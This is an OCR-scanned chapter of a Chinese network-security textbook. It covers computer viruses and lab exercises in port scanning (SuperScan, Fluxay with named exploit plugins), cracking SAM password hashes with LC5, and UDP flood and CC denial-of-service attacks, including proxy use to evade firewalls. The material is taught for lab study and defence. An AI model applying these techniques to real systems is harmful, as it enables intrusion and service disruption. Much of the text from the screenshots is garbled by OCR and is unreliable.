防范 会 话 劫持 攻击 的 方法 : 在 设计 认证 的 时 候 就 强行 要 求 客户 端 必须 唯一 ,并 且 认证 
信息 在 多 少 天 之 后 就 过 期 的 机 制 ,但 是 这 样 也 会 和 将 Cookie 和 IP 绑 定 一 样 ,可 能 带 来 不 好 
的 用 户 体验 ,如 何在 设计 的 时 候 意 识 到 这 个 问题 并 且 权 衡 应 用 和 安全 的 平 衔 点 才 是 Web 应 
用 程序 设计 者 要 考虑 的 难题 。 


8.5 计算 机 病毒 


要 认识 病毒 ,就 要 从 病毒 的 定义 分 类 、 结 构 、 传 染 机 制 等 多 个 方面 对 病毒 有 个 全 面 的 
了 解 。 


3.5.1 计算 机 病毒 概述 


T. 计算 机 病毒 的 定义 


计算 机 病毒 (computer virus) 在 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 明 
确定 义 ,“ 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 
用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 计 算 机 病毒 就 像 生物 病毒 一 样 , 有 
独特 的 复制 能 力 , 可 以 很 快 地 蔓延 ,而 且 常 常 难以 根除 。 它 们 能 把 自身 附着 在 各 类 类 型 的 文 
件 上 。 当 文件 被 复制 或 从 一 个 用 户 传送 到 另外 一 个 用 户 时 ,它们 就 随同 文件 一 起 蔓延 开 来 。 


2. 计算 机 病毒 的 分 类 


按照 计算 机 病毒 存在 的 媒体 进行 分 类 ,可 以 划分 为 网 络 病毒 .文件 病毒 和 引导 型 病毒 。 
网 络 病毒 通过 计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ,文件 病毒 感染 计算 机 中 的 文件 (如 
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COM, EXE, DOC 等 ) ,引导 型 病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 引导 扇 区 (MBR ) 。 

按照 计算 机 病毒 传染 的 方法 进行 分 类 ,可 分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 驻 留 型 病 
毒 感染 计算 机 后 ,把 自身 的 内 存 驻 留 部 分 放 在 内 存 中 ,这 一 部 分 程序 挂 接 系统 调用 并 合并 到 
操作 系统 中 去 ,处 于 激活 状态 ,一 直到 关机 或 重新 启动 。 非 驻 留 型 病毒 在 得 到 机 会 激活 时 并 
不 感染 计算 机 内 存 ,一些 病毒 在 内 存 中 留 有 小 部 分 ,但 是 并 不 通过 这 一 部 分 进行 传染 ,这 类 
病毒 也 被 划分 为 非 驻 留 型 病毒 。 


3. 计算 机 病毒 的 结构 


由 于 计算 机 病毒 是 一 种 特殊 程序 ,其 结构 决定 了 病毒 的 传染 能 力 和 破坏 能 力 。 计 算 机 
病毒 程序 主要 包括 三 大 部 分 : 一 是 传染 部 分 (传染 模块 ), 是 病毒 程序 的 一 个 重要 组 成 部 分 , 它 
负责 病毒 的 传染 和 扩散 ; 二 是 表现 和 破坏 部 分 (表现 模块 或 破坏 模块 ), 是 病毒 程序 中 最 关键 
的 部 分 , 它 负责 病毒 的 破坏 工作 ; 三 是 触发 部 分 (触发 模块 ) ,病毒 的 触发 条 件 是 预先 由 病毒 纺 
者 设置 的 ,触发 程序 判断 触发 条 件 是 否 满足 ,并 根据 判断 结果 来 控制 病毒 的 传染 和 破坏 动作 。 


3.5.2 计算 机 病毒 的 传染 机 制 
1. 计算 机 病毒 的 传染 方式 


所 谓 传染 ,是 指 计算 机 病毒 由 一 个 载体 传播 到 另 一 个 载体 ,由 一 个 系统 进入 另 一 个 系统 
的 过 程 。 这 种 载体 一 般 为 磁盘 或 磁带 , 它 是 计算 机 病毒 赖 以 生存 和 进行 传染 的 媒介 。 但 是 ， 
只 有 载体 还 不 足以 使 病毒 得 到 传播 。 促 成 病毒 的 传染 还 有 一 个 先决 条 件 , 可 分 为 两 种 情况 ， 
或 者 叫做 两 种 方式 。 其 中 一 种 情况 是 ,用 户 在 复制 磁盘 或 文件 时 ,把 一 个 病毒 由 一 个 载体 复 
制 到 另 一 个 载体 上 。 或 者 是 通过 网 络 上 的 信息 传递 ,把 一 个 病毒 程序 从 一 方 传递 到 另 一 方 。 
这 种 传染 方式 叫做 计算 机 病毒 的 被 动 传染 。 另 一 种 情况 是 ,计算 机 病毒 是 以 计算 机 系统 的 
运行 以 及 病毒 程序 处 于 激活 状态 为 先决 条 件 。 在 病毒 处 于 激活 的 状态 下 ,只 要 传染 条 件 满 
足 , 病 毒 程序 能 主动 地 把 病毒 自身 传染 给 另 一 个 载体 或 男 一 个 系统 。 这 种 传染 方式 叫做 计 
算 机 病毒 的 主动 传染 。 


2. 计算 机 病毒 的 传染 过 程 


对 于 病毒 的 被 动 传染 而 言 , 其 传染 过 程 是 随 着 复制 磁盘 或 文件 工作 的 进行 而 进行 的 ,而 
对 于 计算 机 病毒 的 主动 传染 而 言 ,其 传染 过 程 是 这 样 的: 在 系统 运行 时 ,病毒 通过 病毒 载体 
即 系统 的 外 存储 器 进入 系统 的 内 存储 器 , 常 驻 内 存 ,并 在 系统 内 存 中 监视 系统 的 运行 。 在 病 
毒 引导 模块 将 病毒 传染 模块 驻 留 内 存 的 过 程 中 ,通常 还 要 修改 系统 中 断 向 量 入 口 地 址 (例如 
INT 13H 或 INT 21H), 使 该 中 断 向 量 指向 病毒 程序 传染 模块 。 这 样 , 一 旦 系统 执行 磁盘 读 
写 操作 或 系统 功能 调用 ,病毒 传染 模块 就 被 激活 ,传染 模块 在 判断 传染 条 件 满足 的 条 件 下 ， 
利用 系统 INT 13H 读 写 磁盘 中 断 把 病毒 自身 传染 给 被 读 写 的 磁盘 或 被 加 载 的 程序 ,也 就 是 
实施 病毒 的 传染 ,然后 再 转移 到 原 中 断 服务 程序 执行 原 有 的 操作 。 


3.5.8 计算 机 病毒 的 防范 
可 以 采取 以 下 措施 防范 计算 机 病毒 ; 有 规律 地 备份 系统 关键 数据 ; 制作 应 急 盘 ; 提高 
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对 光盘 的 警觉 ; 限制 使 用 计算 机 的 人 的 数量 ; 使 用 360 ZET 


1. 什么 是 因特网 上 的 踩点 ?都 有 哪些 踩点 技巧 ? 
2. 什么 是 端口 扫描 ? 都 有 哪些 扫描 技术 ? 
1 


沫 点 与 网 络 扫描 有 什么 区 别 ? 
. Windows 系统 有 哪些 查 点 方法 ? 
5. 如何 利 用 工具 获取 Windows 系统 System 账户 的 权限 ? 
6. Windows 系统 有 哪些 创建 后 门 的 工具 ? 
7. 有 哪些 拒绝 服务 的 攻击 方法 ? 
8. 缓冲 区 溢出 攻击 的 基本 原理 是 什么 ? 
9. 木马 系统 各 部 分 的 作用 是 什么 ? 


实 训 3.1 Ping Tracert 和 Sam Spade 网 


【 实 训 目 的 】 

3» 握 Ping, Tracert 和 Sam Spade 三 种 扫描 工具 。 
【 实 训 环境 】 

局 域 网 .连接 到 Internet, Sc ill 

【 实 训 内 容 】 


1. Ping 


Ping 目标 主机 是 否 存活 ,如 图 3-15 所 示 。 


图 3-15 Ping 目标 主 机 


2. Tracert 

Tracert 记录 到 达 目 标 主机 的 路 径 , 如 图 3-16 所 示 。 

3. Sam Spade 

Sam Spade 记录 到 达 目 标 主机 的 路 径 ,如 图 3-17 所 示 。 


上 系列 软件 。 


络 探测 


客 攻 击 技术 


Vtracert wwu.hacz.edu 


[Tracing route to uww.hac 218.42.224.111 
lover a maximum of 38 hop: 


《1 ns a 192.168.1.1 

23 ns 1.193.56.1 

20 mo 2 69.123.85.222. broad.z2.ha.dynanic.163data.com.cn 

.691 
23 161.123.85.222.broad.zz.ha.dynanic.163data.com.c| 
-1611 

38 202.97.48.201 

56 282.97.35.69 

49 282.97.58.174 

=- Request timed out. 

58 202.127.216.201 

s 282.112.36.253 

282.112.36.249 
282.112.53.157 
bjwh4.cernet.net [282.112.46.65] 
282.112.61.58 
282.112.38.30 
210.43.146.37 
218.43.145.242 
222.21.219.18 
Request tined 
Request tined 
Request tined 
Request tined 
Request tined o! 
Request tined 
Request tined 
Request 
Reques 
Request 
Request 
Request 


可 


Irace complete. 


> 


图 3-16 Tracert 记录 路 径 


File Edit Vier Window Parier Tools Kalp 


[rww.hacz.edu.cn | | Gto 习 @fwhois.geektools.com El: 


04/09/11 09: Fast traceroute www.hacz.edu. 
Lom 
TTL: 
TTL: 
TTL: 


pending 


pending 


图 3-17 Sam Spade 记录 路 径 
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& 3.2 SuperScan 网 络 扫描 


【 实 训 目 的 】 

(1) 熟悉 端口 扫描 的 原理 ; 通过 练习 使 用 网 络 端口 扫描 器 ,了 解 目标 主机 开放 的 端口 
和 服务 程序 ,从 而 获取 系统 的 有 用 信息 ,发 现 网 络 系统 的 安全 漏洞 。 

(2) 掌握 在 Windows 下 ,如何 使 用 SuperScan 进行 网 络 端口 扫描 。 

【 实 训 环境 】 

CD 局 域 网 环境 ,2 一 3 台 Windows Server 2003 服务 器 ,一 台 客 户 机 ,开放 服务 。 

(2) SuperScan 是 对 目标 主机 的 安全 性 弱点 进行 扫描 检测 的 工具 软件 。 它 具有 数据 
分 析 功 能 ,通过 对 端口 的 扫描 分 析 , 可 以 发 现 目标 主机 开放 的 端口 和 所 提供 的 服务 ,以 及 
相应 服务 软件 版 本 和 这 些 服务 软件 的 安全 漏洞 ,从 而 能 及 时 了 解 目标 主机 存在 的 安全 
隐患 。 

C3) 扫描 工具 根据 作用 的 环境 不 同 , 可 分 为 两 种 类 型 : 网 络 漏洞 扫描 工具 和 主机 漏洞 
扫描 工具 。 主 机 漏洞 扫描 工具 是 指 在 本 机 运行 的 扫描 工具 ,以 期 检测 本 地 系统 存在 的 安全 
漏洞 。 网 络 漏洞 扫描 工具 是 指 通过 网 络 检测 远程 目标 网 络 和 主机 系统 存在 漏洞 的 扫描 
工具 。 

【 实 训 内 容 】 


1. SuperScan 


SuperScan 的 界面 如 图 3-18 所 示 。 


扫描 | 主机 和 服务 扫 苍 设置 | 扫描 过 项 | 工具 “| Windors 权 举 | 关于 | 


FIP 地 址 
mar o| pEr mz O — Sh 
me — — — 
[sm x] 

从 放 作 这 到 地 址 “| 


ID EC Emus) 


3-18 SuperScan 


53: ”黑客 攻击 技术 


2. SuperScan 对 本 地 主机 进行 主机 名 解析 和 端口 扫描 
TCP 数据 包 首部 结构 如 图 3-19 所 示 。 


源 端口 目标 端口 
序号 
确认 序号 
scit | 保留 4GRG [ack [Psu [ns [ww | x prr 
校 验 和 紧急 指针 


[7] 


有 6 个 标志 位 
图 3-19 TCP 数 据 包 首部 结构 


(D SYN 用 来 建立 连接 。 
(2) ACK 为 确认 标志 位 ,例如 , 当 SYN=1,ACK=0 表示 请 求 连接 的 数据 包 ; 当 
SYN=1,ACK=1 表示 接受 连接 的 数据 包 。 
(3) FIN 表示 发 送 端 已 经 没有 数据 可 传 了 ,希望 释放 连接 。 
(4) RST 位 用 于 复位 错误 的 连接 ,比如 收 到 的 一 个 数据 分 段 不 属于 该 主机 的 任何 一 个 
连接 , 则 向 远 端 计算 机 发 送 一 个 RST=1 的 复位 数据 包 , 拒 绝 连接 请 求 。 
1) TCP SYN 扫描 
本 地 主机 向 目标 主机 发 送 SYN 数据 段 ,如 果 远 端 目 标 主机 端口 开放 , 则 回应 SYN=1， 
ACK==1, 此 时 本 地 主机 发 送 RST 给 目标 主机 ,拒绝 连接 。 如 果 远 端 目标 主机 端口 未 开放 ， 
则 会 回应 RST 给 本 地 主机 。 
由 此 可 知 ,根据 回 应 的 数据 段 可 判断 目标 主机 的 端口 是 否 开放 。 由 于 TCP SYN 扫描 
没有 建立 TCP 正常 连接 ,所 以 降低 了 被 发 现 的 可 能 ,同时 提高 了 扫描 性 能 。 
2) TCP FIN 扫描 
本 地 主机 向 目标 主机 发 送 FIN==1, 如 果 远 端 目标 主机 端口 开放 , 则 丢弃 此 包 , 不 回应 ; 
如 果 远 端 目标 主机 端口 未 开放 , 则 返回 一 个 RST 包 。FIN 扫描 通过 发 送 FIN 的 反馈 判断 
远 端 目标 主机 的 端口 是 否 开放 。 
由 于 这 种 扫描 方法 没有 涉及 TCP 的 正常 连接 ,所 以 使 扫描 更 隐秘 ,也 称 为 秘密 扫描 。 
这 种 方法 通常 适用 于 UNIX 操作 系统 主机 ,但 有 的 操作 系统 (如 Windows 2003) 不 管 端口 
是 否 打开 ,都 回复 RST, 这 时 这 种 方法 就 不 适用 了 。 
3) UDP ICMP 扫描 
这 种 方法 利用 了 UDP, 当 向 目标 主机 的 一 个 未 打开 的 UDP 端口 发 送 一 个 数据 包 时 ,会 
返回 一 个 ICMP_PORT_UNREACHABLE 错误 ,这 样 就 会 发 现 关 闭 的 端口 。 
。 对 于 两 台 计算 机 间 的 任 一 个 TCP 连接 ,一 台 计 算 机 的 一 个 [IP 地 址 : 端口 ] 套 接 字 
会 和 另 一 台 计算 机 的 一 个 LIP 地 址 : 端口 ] 套 接 字 相对 应 ,彼此 标识 着 源 端 .目的 端 
上 数据 包 传 输 的 源 进程 和 目标 进程 。 这 样 网 络 上 传输 的 数据 包 就 可 以 由 套 接 字 中 
的 IP 地 址 和 端口 号 找到 需要 传输 的 主机 和 连接 进程 了 。 可 见 ,端口 和 服务 进程 一 
一 对 应 ,扫描 开放 的 端口 ,可 以 判断 计算 机 中 正在 运行 的 服务 进程 。 
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A 


* TCP/UDP 的 端口 号 在 0—65535 范围 之 内 ,其 中 1024. 以 下 的 端口 给 常用 的 网 络 服 
务 。 例 如 ,21 端口 为 FTP 服务 ,23 端口 为 Telnet 服务 ,25 端口 为 SMTP 服务 ,80 
端口 为 HTTP 服务 ,110 端口 为 POP3 服务 等 。 图 3-20 一 图 3-22 所 示 为 扫描 端口 
20 至 端口 80 ,设置 端口 列表 。 


^« SuperScan 4. 0 


ius  CEURPRSIUSOR | 扫描 选项 | TRO [rinde 权 举 | 关于 | 


Iv ARER ERE a) 

F 查找 主机 Mt s) [2000 
厂 地 址 掩 码 清 求 
厂 信息 请 求 

F UDP 端口 扫描 超时 设置 ns) [2000 — 


了 MD po |7 HERE G Data C Data+ ICNP 
aman [o 
Lis jl 
Pe | [n 


F TADH eted aa 一 

msan [o Ee HERE CEMER CS 

smanE 广 一 
Arti res LN 


恢复 默认 值 QD 


00:12 — Saved log file Lived [TCE open: O [UDP open: O [155/155 done 元 


图 3-20 设置 端口 


= SuperScan 4.0 


fus | 主机 和 服务 扫描 设置 | 扫描 和 项 | 工具 “| Windons 枚 党 | 关 于 | 

IP 地 址 

主机 /TP [ Ei 

开始 了 Xe .lm . LI. 

se mr X|[[192 165 254 
ET 


3r | 结束 TP 


192.168.1.100 192.168.1.254 


Live hosts this batch: 2 a 


192.168.1.100 


y Found 


Performing banner grabs... 
TCP banner grabbing (2 ports) 
UDP banner grabbing (1 ports) 

Reporting scan results... 

-------- Scan done -------- 


Discovery scan finished: 08/29/11 21:14:34 


BERE 


D 1" 


[0:27 Saved log file live 2 [TCP open: 2 [UDP open: 1 [155/155 done 4 


图 3-21 扫描 端口 


[ 回 swpersean Report 图 


SuperScan Report - 08/29/11 21:14:07 


322 扫描 报告 


3. SuperScan 综合 集成 工具 对 局 域 网 的 主机 进行 扫描 
SuperScan 综合 集成 工具 对 局 域 网 的 主机 进行 扫描 的 界面 见 图 3-23。 


ae | 主机 和 服务 扫描 设置 | 扫 护 选项 IA rinse 枚 举 | 关 于 | 


主机 名 /IP7URL [1s2 188.1.100 
默认 Whois 报 务 器 [rhois networksoluti ons coe moj 


»| 查找 主机 各 /IP Pinging 192.168.1.100 (192.168.1.100) 
Ex Ping Response from 192.168.1.100 in 94 as 
M Basponsa fron 192.168.1.100 dn 8 ae 
| Reims 
F8 TTP HEAD EX [rest.com810.1.2.3 
[| ee ee ss 192.150.1100 a 


| rs Ger wR ois.neveorisolucions.con. -- 
D] ™is (NOTICE AND TERMS OF USE: You are not authorized to 


à access or query our WHOIS 
2 | suc mois database through the use of high-volume, automated, 
[inf ARIN Whois electronic processes. The 
[Data in Network Solutions’ WHOIS database is provided by 
Lr] RIPE thois [Netvork Solutions for information 
d oses cnly, and to assist persons in obtaining 
x] snc meis infcrmetion about or related 
[to a domain name registration record. Netvork Solutions 
does not guarantee its accuracy. 
submitting a WHOIS query, you agree to abide by the 
following teras of use: s 
Q4 — Served Log file dive 2 FCP oven: 0 ADP open: O [155/155 done z 


图 3-23 对 局 域 网 主机 扫描 
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Nx 


(il 3.3 Fluxay 5.0 综合 扫描 


【 实 训 目 的 】 

掌握 使 用 综合 漏洞 扫描 及 安全 评估 工具 ,加 深 对 各 种 网 络 和 系统 漏洞 的 理解 。 
【 实 训 环境 】 

(1) 两 台 或 更 多 台 运 行 Windows Server 2003 的 计算 机 ,局 域 网 环境 。 

(2) 流光 (Fluxay 5.0) 工 具 软 件 。 

【 实 训 内 容 】 


1. 认识 Fluxay 5.0 


Fluxay 5.0 综合 扫描 工具 如 图 3-24 所 示 。 


小 榕 软件 -【 流 光 5.0】 Build 3310 OMP) 


4 
EER E 1 
=> | n | oso xóui sm EJ 
图 3-24 Fluxay 5. 0 综合 扫描 工具 
各 部 分 功能 如 下 。 


区 域 1: 暴力 破解 的 设置 区 域 。 

区 域 2: 控制 台 输出 。 

区 域 3: 扫描 出 来 的 典型 漏洞 列表 。 

区 域 4: 扫描 或 者 暴力 破解 成 功 的 用 户 账号 。 
区 域 5: 扫描 和 暴力 破解 的 速度 控制 。 

区 域 6: 扫描 和 暴力 破解 时 的 状态 显示 。 
区 域 7: 中 止 按钮 。 

区 域 8: 探测 记录 查找 。 


2. 设置 扫描 参数 


选择 “文件 ”>“ 高 级 扫描 向 导 ” 命 令 , 设 置 扫描 参数 ,按照 提示 ,逐一 单 击 “ 下 一 步 " 按 钮 ， 
如 图 3-25 一 图 3-29 所 示 。 


x 小 榕 软件 -【 流 光 5. 0】 Build 3310 (0 用 户 ) 


EELE m" 


"ECT cuis 


EEELSI CtrltShifttS 


SOROR 


RADLER [73 
导入 记录 » 
流光 / 流 影 结 果 分 析 上 
Tluxay Sensor 结果 分 析 » 
E] neo ian AMGÍEB A 
退出 0) Aur 主机 
> 
AP Ej [E 771 C 
参数 第 一 步 
设置 CGI Rules x| 
titit: [192.166.1.100 Eze E; Kit 0TA 
SémhbdE: [192 168.1.254 E14 AH ^ 
[ia m 
目标 系统 [259 /». it m 
HERES EN in m 
a : Iz. d [autoexec. bat. "m 
LARE ^ Eau asa m 
Hros [7^ Y) 7 
[d rors ga. [à m 
Berr [2,. ANN NN " g 
Iz EU zh s 
BA mr a 
ernt sig ) Em 
| Tem "m 
图 3-26 设置 参数 第 二 步 图 3-27 设置 参数 第 三 步 


PLUGINS X| 


|Windows NI/2000 zi 共计 [0011] 个 插件 


BERPSTA 


E Cchrozy 6.2 Exploit 

回 PontPage 2000 Extension Exploit 

AFT Server 

[IIS 5.0 WEBDAV Exploit 

回 Tss.0 NULL Printer Exploit 

回 mL Session Avaliable 

IzE Get 0S 

回 Yinaors 2000 RPC Locator Remote Exploit 
[IIS 5.0 WEBDAV Anonynouse Deploy 


c 


E \Progran Files\Fluray\brute. dic 
Rre 


[Program Files\FlurayiReports\192. 188. 


533333333 


3rEHMESH:. jo J (PAMO 


到 | cra c» | 


图 3-28 设置 参数 第 四 步 图 3-29 设置 参数 第 五 步 
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3. 扫描 结果 


设置 参数 完成 ,Fluxay 5.0 的 扫描 引擎 可 安装 在 不 同 主机 上 (包括 本 地 主机 )。 单 击 “ 开 
始 ? 按 钮 ,窗口 右 侧 及 下 侧 滚 动 显示 扫描 结果 ,如 图 3-30 和 图 3-31 所 示 。 


主机 EL CJLI FE 


RP&: 


选项 


图 3-30 选择 主机 


FURER: 
5 0s 日 标 主机 | 
[n rom En 
Da me 主机 
D8 rr 主机 
DO ure zit 
[13$ pRoxY 主 机 
DS ron 主机 
O mss 主机 
> Dn hioc 
Dg mrn 
DE rcr tt 
DO 解 玛 字典 或 方案 
DË 探 齐 历史 纪录 


主机 


[5] ARERR 1995-2002 ETER MUNA 
密码 [主机 
> 
[7] a poyon faire — ENEC NT 


图 3-31 滚动 显示 结果 


4. 查看 扫描 报告 


扫描 结束 ,查看 扫描 报告 ,如 图 3-32 和 图 3-33 所 示 。 


8D.127.0.0.1-127.0.0.255.html 


2006/05/17 01:27:22 
192. 1.101.htmi. 7 


图 3-32 扫描 报告 1 


) 流光 IY 扫描 报告 - Hozilla Firefox 


Xp dp SEV HLO SEQ IAV Who 
€ C X ò h ft) te//C/trogu Files/Fluray/Reports/192.188.1 Ýr ~ | 
=- 一 一 iud 


ESTN ES 


http://www.netXeyes.com 


http://www.netXeyes.org 
【小 榕 作品 】 


小 榕 软件 实验 室 1995-2002 


图 3-33 ”扫描 报告 2 


[ 实 训 3.4 口令 破解 

【 实 训 目 的 】 

通过 密码 破解 工具 LCS 的 使 用 ,了 解 账号 口令 的 安全 性 ,掌握 安全 口令 的 设置 原则 ,以 
保护 账号 口令 的 安全 。LC5 软件 功能 非常 强大 ,通过 实验 来 掌握 如 何 使 用 LCS 来 破解 账号 
口令 。 系统 管理 员 也 可 以 使 用 这 个 软件 来 检测 用 户 计 算 机 密码 的 安全 性 。 

【 实 训 环境 】 

COD 两 台 安装 有 Windows 2000/2003/XP 或 更 高 级 别 的 Windows 操作 系统 ,通过 网 络 
互联 。 
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(2) LC5 密码 破解 软件 ,工具 软件 PwDump 4. 
LC5 的 安装 过 程 具体 如 图 3-34 和 图 3-35 所 示 。 


7. LC5 - InstallShield Wizard 


Welcome to the InstallShield Wizard 
for LC5 


The InstalShield Wizard(TM) wil heip install CS on your 
computer. To continue, dick Next. 


InstallShield Wizard 
Selup Type 
Select the Setup Type to install a) 
^ 


Cick the type of Setup you prefer, then cick Next. 


G fpes Program wil be instaled wih the most common options. Recommended for 
PT most users. 
C Compact Program wil be instaled with minimum required options. 


C Custom You may choose the oplions you want to install Recommended for advanced 
users. 


[eH 
图 3-35 LC5 安装 第 二 步 
选择 一 个 应 用 程序 ,安装 完成 。 
【 实 训 内 容 】 
在 Windows 操作 系统 中 ,用 户 账号 和 口令 经 过 哈 希 变换 后 以 喻 希 列表 形式 存放 在 
\SystemRoot\system32 下 的 SAM 文件 中 。LC5 通过 破解 SAM 文件 来 获取 系统 的 账号 名 
1. 建立 测试 账户 


在 测试 主机 上 建立 用 户 名 test 的 账户 ,方法 是 依次 打开 “控制 面板 ”>“ 计 算 机 管理 ”， 
在 “本 地 用 户 和 组 ”下 ,选择 用户 ,如 图 3-36 所 示 ,输入 用 户 名 为 test, 密 码 为 空 。 


E 计算 机 管理 
ERST HR) SEV Eno) SEO) 
e» mxf Em 


VMware User. 
EHO ERR 
Account used for running the ASP.N... 
PRRD HEEE... 
提供 远程 协助 的 周记 
ENER TEZDA nemet TARBH.. 
-ars f BITBSBISASRISEA Iter... 
5QLDebugger 


This user account is used by the Viu... 
n RENEA.. 


Visual Studio Analyzer 服务 器 组 件 的 账号 


图 3-36 ”建立 账户 


2. 运行 LC5 


在 LC5 主 界面 的 主 菜单 中 ,选择 “文件 ”>“LC5 向 导 ” 命 令 , 按 照 提示 , 单 击 “ 下 一 步 ” 按 


钮 ,系统 会 出 现 如 图 3-37 所 示 的 用 户 test 密码 为 空 的 破解 成 功 界面 。 


05 容 笑 汉化 版 QQ:40940064 http :978229.126. com - [无 标题 1 
MO FEV SAD 任务 MEW Wi» 


EA 


wügne ^ [«.[ne [nem kene esa [A 
DE WERE S sees] 
zm 
20 
uc E 
无 
20 
«I m B 


图 3-37 破解 成 功 


3. 修改 密码 为 123123 


将 系统 密码 改 为 123123, 再 次 执行 ,LC5 很 快 会 破解 成 功 ,出 现 如 图 3-38 所 示 的 用 户 


test ,密码 123123 的 破解 成 功 界面 。 


(© astake LC5 - [Imtitleal] 


DICTIONARY/ HYBRID 


IGHOST-IRUT. .. | Gu 

GHOST-MRDT. .. | Kelphssistant 

'GHOST-MRDT. SUPPORT 38894540 * empty * 

GHDSTHMRDT... test [123123 (x 123123 
GHOST-MRDT. .. Administrator | 


PRECOMPUTED 


图 3-38 再 次 破解 成 功 
4. 修改 密码 为 security123 
将 系统 密码 改 为 security123 ,再 次 执行 ,LC5 没有 完全 破解 ,出 现 如 图 3-39 所 示 的 


(Ò stake LC5 - [Untitledl] 


DICTIONARY/ HYBRID 


PRECOMPUTED 


3-39 破解 失败 


这 是 因为 刚才 密码 设置 成 了 字符 串 十 数字 格式 ,比较 复杂 ,所 以 破解 不 能 成 功 ,必须 选 
择 复杂 口令 破解 方法 。 


G 3.5 拒绝 服务 攻击 


【 实 训 目 的 】 

通过 练习 使 用 DoS/DDoS 攻击 工具 对 目标 主机 进行 攻击 ,理解 DoS/DDoS 攻击 的 原理 
及 其 实施 过 程 ,掌握 检测 和 防范 DoS/DDoS 攻击 的 措施 。 

【 实 训 环 境 】 

(D 两 台 安 装 Windows Server 2003 的 PC, 在 其 中 一 台 上 安装 UDP Flooder 软件 .CC 
攻击 软件 和 花 刺 代理 软件 。 


g 


据 包 包含 的 内 容 ,默认 情况 下 为 UDP Flooder. Server Speed pkts/sec) 
stress test 的 文本 内 容 。 单 击 Go 按钮 即 可 对 目标 主 四 
机 发 起 UDP 泛 洪 攻击 ,如 图 3-40 Bros 。 o naa [ wf we 


包 ,这 需要 事先 对 系统 监视 器 进行 配置 。 选 择 * 控 抽 
面板 ”>“ 管 理工 具 ”>“ 性 能 ”命令 ,首先 在 系统 监视 器 || mem o 
中 
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(2) 两 台 PC 通过 集线器 相连 ,组 成 一 个 局 域 网 。 
【 实 训 内 容 】 
1. UDP Flooder 攻击 练习 


具体 操作 如 下 。 
(1) UDP Flooder 是 一 种 采用 UDP 泛 洪 攻击 方式 的 DoS 软件 ,可 以 向 特定 的 IP 地址 


和 端口 发 送 UDP 包 。 在 IP/hostname 和 Port 文本 框 “全 rr 353 
Ph 指定 目标 主机 的 IP 地 址 和 端口 号 , Max duration i 
设 定 最 长 的 攻击 时 间 , 在 Speed 文本 框 中 可 以 设置 
UDP 包 发 送 的 速度 ,在 Data 文本 框 中 ,定义 UDP 数 Maxdusion(ecs] 站 


(2) 在 被 攻击 主机 中 可 以 查看 收 到 的 UDP 数据 G Tet UDP Flood Server stress test 
| € Fonfie am Et 


Status 


Secondselapsed 0 


击 右 侧 图 文 框 上 面 的 “十 "按钮 或 右 击 , 弹 出 快捷 菜 一 一 一 


单 ,如 图 3-41 所 示 ,选择 “添加 计数 器 ”命令 。 图 3-40 发 起 UDP 泛 洪 攻击 


ij zio wf sEV waw woo Bh —— 0 0 00— 
e» mm e 
1 控制 台 根 节点 
系统 监视 器 
"pe 


i Q/*g uas +X8 bea osp 


最 后 0.000 平均 | 000 景 小 | 0.000 
最 大 0.000 meatia 1:40 


图 3-41 被 攻击 主机 监视 器 查看 数据 包 


(3) 在 弹出 的 “添加 计数 器 ?对 话 框 中 添加 对 UDP 数据 包 的 监视 ,在 “性 能 对 象 "下 拉 列 


表 框 中 选择 UDP, 在 “从 列表 选择 计数 器 ”列表 框 中 ,选择 Datagrams Received/sec, 即 对 收 
到 的 UDP 数据 包 进 行 计数 ,然后 配置 好 包 计 数 器 信息 的 日 志文 件 , 如 图 3-42 所 示 。 


(4) 在 被 攻击 主机 上 打开 WireShark 工具 ,可 以 捕获 由 攻击 者 计算 机 发 到 本 地 计算 机 


的 UDP 数据 包 , 可 以 看 到 内 容 为 UDP Flood. Server stress test 的 大 量 UDP 数据 包 , 如 
图 3-43 所 示 。 
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RENE EI 
C 从 计算 机 选择 计数 器 QD. 


[viemsrl 
性 能 对 象 @) 
wr 

口 所 有 计数 器 中 所 有 范例 QD 
ORERE (D 本 从 列表 二 择 范 例 四 


Detagrens No Port/sec 
Detegrens Received Errors 


Datagrans Sent/sec 
Datagrens/sec 


LE 


图 3-42 配置 日 志文 件 


Sniffer Portable - Local, Ethernet (Line speed at 100 Mbps) — [Snifl: ... 
是 Fil。 llonitor Captwe Display Tools Database Window Help 


sla| 55| caaeaae] 2| e S, lulla] s] z= 
TL 


1 JDP 

1221 UDE 

122]|UDP 

122]|UDP 
192.168.1.122]| UDP 
[192.168.1.122]|UDP 


fd id la 00 Oc 29 83 67 28 08 00 45 00 
d3 00 00 80 11 7a 8f c0 a8 01 7b c0 a8 
` 4-20-00 50-00-31-22 fe 2a 2a 2a 2a 2a 20 -WEN + 
S5 44 50 20 46 6c 6f 6f 64 2e 20 53 65 72 76 65 UDP Flood. Serve 
2 20 3 74 72 65 73 73 20 74 65 73 74 20 2a 2a r stress test w 
: 2a 2a 


For Help, press FI 


图 3-43  WireShark 捕获 数据 包 
2. CC 攻击 练习 


CC 主要 是 用 来 攻击 页 面 的。 对 于 论坛 ,访问 的 人 越 多 ,论坛 的 页 面 越 多 ,数据 库 就 越 
大 ,被 访问 的 频率 也 越 高 ,占用 的 系统 资源 也 就 相当 可 观 。CC 就 是 充分 利用 这 个 特点 , 模 
拟 多 个 用 户 ( 多 少 线程 就 是 多 少 用 户 ) 不 停 地 进行 访问 (访问 那些 需要 大 量 数据 操作 ,就 是 需 
要 大 量 CPU 时 间 的 页 面 ) 。 

代理 可 以 有 效 地 隐藏 身份 ,也 可 以 绕 开 所 有 的 防火 墙 ,因为 几乎 所 有 的 防火 墙 都 会 检测 
并 发 的 TCP/IP 连接 数目 ,超过 一 定数 目 一 定 频率 就 会 被 认为 是 Connection-Flood。 使 用 
代理 还 能 很 好 地 保持 廉洁 ,这 里 发 送 了 数据 ,代理 帮助 转发 给 对 方 服务 器 ,就 可 以 马上 断 开 ， 
代理 还 会 继续 保持 着 和 对 方 的 连接 。 
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(1) 打开 CC 的 可 执行 程序 ,如 图 3-44 所 示 。 


CC v 2.1b Coded By Fr.Qaker[E. S. T]Beta Version 


Refer [rre google. con. 


Host frre. hackeroo. com 


Cookie 


pa 
